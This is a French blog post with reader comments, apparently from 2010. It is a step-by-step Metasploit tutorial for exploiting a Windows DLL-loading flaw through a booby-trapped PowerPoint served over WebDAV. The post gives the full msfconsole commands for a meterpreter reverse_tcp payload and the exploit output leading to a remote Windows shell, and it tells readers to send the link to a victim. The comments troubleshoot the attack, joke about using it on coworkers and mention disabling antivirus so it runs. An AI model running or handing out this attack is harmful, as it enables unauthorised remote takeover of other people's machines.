Metasploit et les failles dans les fichiers DLL de Windows


Windows
Une nouvelle faille de sécurité vient d'être découverte dans le système de chargement des DLL de Windows. Celle-ci peut permettre à une personne malveillante de prendre le contrôle d'un ordinateur à distance. Bien entendu, il est très facile de mettre en place ce genre d'attaque avec Metasploit et c'est ce que nous allons voir dans cet article.

Pour arriver à nos fins, nous allons utiliser le module "webdav_dll_hijacker" prévu à cet effet. Celui-ci permet de lancer un serveur Webdav avec un fichier PowerPoint infecté, portant le nom de presentation.ppt.

Voici les commandes à utiliser dans Metasploit (ici : 192.168.1.100 est la machine de l'attaquant) :

$ ./msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf > show options
msf > set BASENAME "presentation"
msf > set EXTENSIONS "ppt"
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LPORT 9999
msf > set LHOST 192.168.1.100

Le module étant correctement configuré, nous pouvons lancer l'attaque :

msf > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*]
[*] Exploit links are now available at \\192.168.1.100\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.100:80/
[*] Server started.

Un serveur webdav est alors démarré. Il faut ensuite envoyer l'adresse \\192.168.1.100\documents\ à une victime. Si la personne utilise cette dernière et ouvre le fichier presentation.ppt, avec son navigateur de fichiers ou Internet Explorer, Metasploit vous indiquera quelque chose comme ceci :

[*] GET => DATA (/documents/presentation.ppt)
[*] PROPFIND /documents/pp7x32.dll
[*] PROPFIND => 207 File (/documents/pp7x32.dll)
[*] GET => DLL Payload
[*] Sending stage (748544 bytes) to 192.168.1.106
[*] PROPFIND /documents/pp4x322.dll
[*] PROPFIND => 207 File (/documents/pp4x322.dll)
[*] GET => DLL Payload
[*] Sending stage (748544 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened...

Il ne restera plus qu'à prendre possession de la machine à distance :

msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>


19 Commentaires pour "Metasploit et les failles dans les fichiers DLL de Windows"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    Mais je suis une personne malveillante...!

    RépondreRépondre
    inalgnu , le 25 août 2010 à 08:25
  •  

    @inalgnu : je m'en doutais...

    RépondreRépondre
    Pti-seb , le 25 août 2010 à 12:27
  •  

    Bien le bonjour !!
    Sympa ce petit exploit pour embêter les gens au boulot ;)

    Petit problème pour ma part :s
    Une fois "exploit" de terminé, msf me rend la main et une fois que j'ouvre le fameux fichier, rien ne se passe dans Metasploit :s

    Une idée ?

    Thanks

    PS : Ptit-Seb continue ce site m'est vraiment utile à certains moment ;)

    RépondreRépondre
    Popet , le 25 août 2010 à 14:02
  •  

    @Popet : je vois pas trop. Si tu arrive à ouvrir le fichier, c'est que le serveur webdav est bien lancé. Normalement tu dois voir les GET, PROFIND défiler dans la console...

    Sinon merci pour tes encouragements. :-)

    RépondreRépondre
    pti-seb , le 25 août 2010 à 19:47
  •  

    Hummm ça marche sur toutes les versions de Windows ? Ou que XP sp1-sp2 ?

    RépondreRépondre
    Muy_Bien , le 25 août 2010 à 22:19
  •  

    @Muy_Bien : j'ai l'impression que cela touche toutes les versions de Windows. Mais bon j'ai pas trouvé d'informations là-dessus. Chez moi, j'ai testé avec un Windows XP SP3 et ça fonctionnait.

    RépondreRépondre
    pti-seb , le 26 août 2010 à 08:29
  •  

    @pti-seb : peut être une réponse.

    RépondreRépondre
    Muy_Bien , le 26 août 2010 à 09:34
  •  

    Salut à tous,

    Cela fait que peu de temps que je connais ton blog mais j'y reviens toujours avec curiosité, je dois dire que ce "metasploit" est comme un "jouet" genre coffret du parfait petit pirate !!!

    c'est la première fois que je le teste et après quelques ajustements (lancer avec sudo...), je suis sur le shell de mon XP .... c'est "top".

    Par-contre, Antivir free détecte bien un troyen et j'ai du le faire taire à plusieurs reprises afin de faire fonctionner l'exploit.

    Ciaoo et longue vie à Tuxplanet.

    RépondreRépondre
    Pafzedog , le 26 août 2010 à 10:07
  •  

    Bien le bonjour à tous !

    Ben pour ma part, le serveur démarre bien mais après rien...
    En ouvrant le fichier sur plusieurs PC différents, rien ne se passe dans "msf"

    Une idée ?
    A+

    RépondreRépondre
    Popet , le 26 août 2010 à 14:21
  •  

    @Muy_Bien : bon en faite la faille est plus lié aux logiciels qu'à la version de Windows. Visiblement, il y a déjà plus de 200 applications impactées.

    @Pafzedog : bien il est sacrément efficace ton antivirus alors. Sinon, merci pour tes encouragements.

    @Popet : tu utilise qu'elle distribution ? Car d'après @Pafzedog, sous Ubuntu il faut lancer metasploit avec sudo. Sinon les PC que tu test son sous qu'elle version de Windows ?

    RépondreRépondre
    pti-seb , le 26 août 2010 à 14:32
  •  

    @pti-seb : Et bien c'est une Ubuntu 10.04 mais j'utilise bien sudo pour le lancement. Et la version de Windows et un petit XP SP2 tout ce qu'il y a de plus classique.
    Voilà Voilà
    Thanks :)

    RépondreRépondre
    Popet , le 26 août 2010 à 14:37
  •  

    Testé sur un Windows 7, j'ai pas pu avoir un shell ... il faut dire aussi que ce Windows 7 n'est autre qu'une virtualisation dans un Windows Server ... ça fait peut etre beaucoup pour metasploit. Par contre msf m'affiche bien des lignes des que je clique sur le fichier en question dans Wx 7.

    @Popet : Regarde que apache est arrété si tu l'as : sudo /etc/init.d/apache2 status
    si oui alors arrete le : sudo /etc/init.d/apache2 stop
    et réssaye.

    Sinon il y a quoi comme commandes "rigolotes" pour un shell Windows ? Genre envoyer une notification, changer le fond d'écran ....

    RépondreRépondre
    Muy_Bien , le 26 août 2010 à 15:34
  •  

    @Muy_Bien : pour le fond d'écran, il faut modifier la base de registre en ligne de commande. Tu devrais trouver cela facilement avec google.

    RépondreRépondre
    pti-seb , le 27 août 2010 à 15:44
  •  

    Testé sur Vista+Avast. Avast détecte un cheval de troie et bloque l'attaque quand l'utilisateur clique sur le ppt. Comme quoi, un antivirus sous Windows est utile !!

    RépondreRépondre
    Popeye , le 29 août 2010 à 15:08
  •  

    Salut !

    merci pour ce tuto !

    je suis en train de tester chez moi et apres avoir le ppt, les DLL payload se font correctement mais metasploit n'a pas l'impression d'avoir fini. il n'affiche pas :
    "
    [*] Sending stage (748544 bytes) to 192.168.1.106
    [*] Meterpreter session 1 opened...
    "

    je n'ai donc pas d'ID de session...

    une idee? merci d'avance ! :)

    RépondreRépondre
    Gogo , le 2 septembre 2010 à 18:09
  •  

    sympa la technique merci du tuyau

    RépondreRépondre
    niceman , le 11 septembre 2010 à 21:00
  •  

    salut tt le monde :)
    j'ai essayer de demarrer un serveur webdav chez moi, mais ça pas march chez moi :((
    apres avoir terminer la configuration , qu'on je lance la cmd >exploit (sachant que mon adresse est 192.168.1.3) elle affiche:

    [*] Exploit running as background job.

    [*] Started reverse handler on 192.168.1.3:9999
    [*]
    [*] Exploit links are now available at \\192.168.1.3\documents\
    [*]
    [-] Exploit exception: Permission denied - bind(2)

    sachez bien que j'utilise la derniere version de ubuntu 11.04 !!

    RépondreRépondre
    oshiikaisuko , le 16 juillet 2011 à 14:29
  •  

    @oshiikaisuko : tu ne dois pas avoir les permissions, tu es bien en root ?

    RépondreRépondre
    Booub , le 23 novembre 2011 à 15:30
  •  

    Salut, on le trouve ou le .PPt a ouvrir ?
    a++

    RépondreRépondre
    Rei , le 10 octobre 2012 à 22:20
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité red hat redhat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum